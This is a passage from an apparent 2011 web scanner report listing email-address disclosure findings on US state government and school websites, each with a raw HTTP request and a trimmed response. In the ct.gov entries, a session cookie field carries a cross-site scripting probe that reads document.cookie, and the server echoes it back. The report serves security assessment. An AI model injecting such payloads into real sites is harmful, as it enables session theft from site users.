Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30349
Content-Type: text/html
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fctportal%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<meta HTTP-EQUIV="reply-To" CONTENT="pmg@po.state.ct.us">
...[SNIP]...
<DSFCONTENT ID="1437" NAME="ctportal" ABBREV="CT.gov" TITLE="CT.gov Portal" CONTACT="pmg@po.state.ct.us" uuid="B53DAE08-77E9-42E6-8642-A040ADE11353">
...[SNIP]...
<A class=noUnderline href="mailto:webmaster@po.state.ct.us">
...[SNIP]...

22.131. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/taxonomy/taxonomy.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ctportal/taxonomy/taxonomy.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27258
Content-Type: text/html
Set-Cookie: ctportalPNavCtr%5FGID=; path=/ctportal
Set-Cookie: ctportalPNavCtr=; path=/ctportal
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&AA=False&LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<meta HTTP-EQUIV="reply-To" CONTENT="pmg@po.state.ct.us">
...[SNIP]...
<DSFCONTENT ID="1437" NAME="ctportal" ABBREV="CT.gov" TITLE="CT.gov Portal" CONTACT="pmg@po.state.ct.us" uuid="B53DAE08-77E9-42E6-8642-A040ADE11353">
...[SNIP]...
<A class=noUnderline href="mailto:webmaster@po.state.ct.us">
...[SNIP]...

22.132. http://www.delmar.k12.de.us/education/district/district.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The following email address was disclosed in the response:

Request

GET /education/district/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:34 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=00b424bcc64093de48b0d5db9594ffd3; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="mailto:webdesign@delmar.k12.de.us">webdesign@delmar.k12.de.us</a>
...[SNIP]...

22.133. http://www.dhh.louisiana.gov/links.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhh.louisiana.gov
Path:   /links.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /links.asp HTTP/1.1
Host: www.dhh.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=111614033.1304125393.1.1.utmcsr=la.gov|utmccn=(referral)|utmcmd=referral|utmcct=/Government/Boards_and_Commissions/; __utma=111614033.738094163.1304125393.1304125393.1304125393.1; ASPSESSIONIDAQAAASST=GIHALCJBLNDELFDEKKMHGALF; __utmc=111614033; __utmb=111614033.1.10.1304125393;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 38517
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQADBRTS=PFEHLOMBKLFPIMBKCIAONMMD; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Louisiana Department of Health & Hospitals</title>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; c
...[SNIP]...
<a href="mailto:dhhwebadmin@la.gov" class="Blue">
...[SNIP]...

22.134. http://www.dhh.louisiana.gov/offices/page.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhh.louisiana.gov
Path:   /offices/page.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /offices/page.asp?id=252&detail=7752 HTTP/1.1
Host: www.dhh.louisiana.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/Government/Boards_and_Commissions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 40278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQAAASST=HIHALCJBOLEPJJHMFLAMHGEP; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Records and Statistics (Vital Records) - Center for Records and Statistics - Office of Public Health - Lo
...[SNIP]...
<a href="mailto:dhhwebadmin@la.gov" class="Blue">
...[SNIP]...

22.135. http://www.dhss.delaware.gov/dhss/stylesheets/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhss.delaware.gov
Path:   /dhss/stylesheets/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /dhss/stylesheets/print.css HTTP/1.1
Host: www.dhss.delaware.gov
Proxy-Connection: keep-alive
Referer: http://www.dhss.delaware.gov/dss/ltcmedicaid.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:45:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26920
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html lang="en-us">
<head>
<!-- CLF v2.3 - 01/16/2009 -->
<!-- Global met
...[SNIP]...
<a href="mailto:dhssinfo@state.de.us">dhssinfo@state.de.us</a>
...[SNIP]...

22.136. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business_operations/state_purchasing/myflorida_marketplace HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:01:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:01:54 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 16682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
<a href='mailto:accessible@dms.state.fl.us'>
...[SNIP]...
<a href="mailto:myfloridamarketplace@dms.myflorida.com" target="_self">MyFloridaMarketPlace@dms.MyFlorida.com</a>
...[SNIP]...

22.137. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

Issue detail

The following email address was disclosed in the response:

Request

GET /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD; __utmz=101745940.1304125350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101745940.70297556.1304125350.1304125350.1304125350.1; __utmc=101745940; __utmb=101745940.1.10.1304125350

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:33 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 13621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
<a href='mailto:accessible@dms.state.fl.us'>
...[SNIP]...

22.138. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; __utmz=101745940.1304125350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101745940.70297556.1304125350.1304125350.1304125350.1; __utmc=101745940; __utmb=101745940.2.10.1304125350; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD4F145F707697652604E2877FC7972CDC4DDE8FC33A71829F781F0B634D3965FD40A62CF73B75CB30108FBA03C34499686

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:41 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 11718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...
<a href='mailto:accessible@dms.state.fl.us'>
...[SNIP]...
<a href="mailto:BuyerHelp@myfloridamarketplace.com" target="_self">BuyerHelp@MyFloridaMarketPlace.com</a>
...[SNIP]...

22.139. http://www.dms.myflorida.com/design/dev/javascript/jquery.dataTables.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /design/dev/javascript/jquery.dataTables.js

Issue detail

The following email address was disclosed in the response:

Request

GET /design/dev/javascript/jquery.dataTables.js HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Sat, 30 Apr 2011 01:02:00 GMT
ETag: "28115419-26610-480bbbc770900"
Last-Modified: Mon, 01 Mar 2010 11:41:56 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 157200

/*
* File: jquery.dataTables.js
* Version: 1.6.2
* CVS: $Id$
* Description: Paginate, search and sort HTML tables
* Author: Allan Jardine (www.sprymedia.co.uk)
* Created: 28/3/2008
* Modified: $Date$ by $Author$
* Language: Javascript
* License: GPL v2 or BSD 3 point style
* Project: Mtaala
* Contact: allan.jardine@sprymedia.co.uk
*
* Copyright 2008-2010 Allan Jardine, all rights reserved.
*
* This source file is free software, under either the GPL v2 license or a
* BSD style license, as supplied with this software.
*

...[SNIP]...

22.140. http://www.dms.myflorida.com/design/dev/javascript/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /design/dev/javascript/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /design/dev/javascript/prototype.js HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Sat, 30 Apr 2011 01:02:00 GMT
ETag: "2811541e-d76d-469670e0b1d40"
Last-Modified: Fri, 08 May 2009 14:00:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 55149

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

22.141. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /extension/ezdatetimeselect/design/standard/javascript/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /extension/ezdatetimeselect/design/standard/javascript/calendar.js HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Sat, 30 Apr 2011 01:02:03 GMT
ETag: "15802c-c035-46e5ea02b0e00"
Last-Modified: Fri, 10 Jul 2009 19:03:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 49205

/* Copyright Mihai Bazon, 2002-2005 | www.bazon.net/mishoo
* -----------------------------------------------------------
*
* The DHTML Calendar, version 1.0 "It is happening again"
*
* Details
...[SNIP]...
<mihai_bazon@yahoo.com>
...[SNIP]...

22.142. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/lang/calendar-en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /extension/ezdatetimeselect/design/standard/javascript/lang/calendar-en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /extension/ezdatetimeselect/design/standard/javascript/lang/calendar-en.js HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Sat, 30 Apr 2011 01:02:03 GMT
ETag: "380d7813-e10-46ae7c13f8dc0"
Last-Modified: Wed, 27 May 2009 16:58:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 3600

// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Encoding: any
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 i
...[SNIP]...

22.143. http://www.dms.myflorida.com/mfmp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /mfmp

Issue detail

The following email address was disclosed in the response:

Request

GET /mfmp HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate
Cache-control: no-cache="set-cookie"
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: /index.php/business_operations/state_purchasing/myflorida_marketplace
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: eZSESSIDe55d964d176b2c8162b80453de81825b=bflmfc1hla6nvfgqfls1hi6gs2; path=/
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:35 GMT; path=/
Set-Cookie: AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD4F145F707697652604E2877FC7972CDC4DDE8FC33A71829F781F0B634D3965FD40A62CF73B75CB30108FBA03C34499686;PATH=/;MAX-AGE=3600
Status: 301 Moved Permanently
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 7477


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<a href='mailto:accessible@dms.state.fl.us'>
...[SNIP]...

22.144. http://www.doc.louisiana.gov/view.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doc.louisiana.gov
Path:   /view.php

Issue detail

The following email address was disclosed in the response:

Request

GET /view.php HTTP/1.1
Host: www.doc.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.12
Content-type: text/html
Content-Length: 14300

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="keywords" content="Departme
...[SNIP]...
<a href ="mailto:webmaster@corrections.state.la.us" align = "center">webmaster@corrections.state.la.us</a>
...[SNIP]...

22.145. http://www.doc.state.nc.us/clemency/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doc.state.nc.us
Path:   /clemency/

Issue detail

The following email address was disclosed in the response:

Request

GET /clemency/ HTTP/1.1
Host: www.doc.state.nc.us
Proxy-Connection: keep-alive
Referer: http://nc.gov/1222,1222,Online_Services,Online_Services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
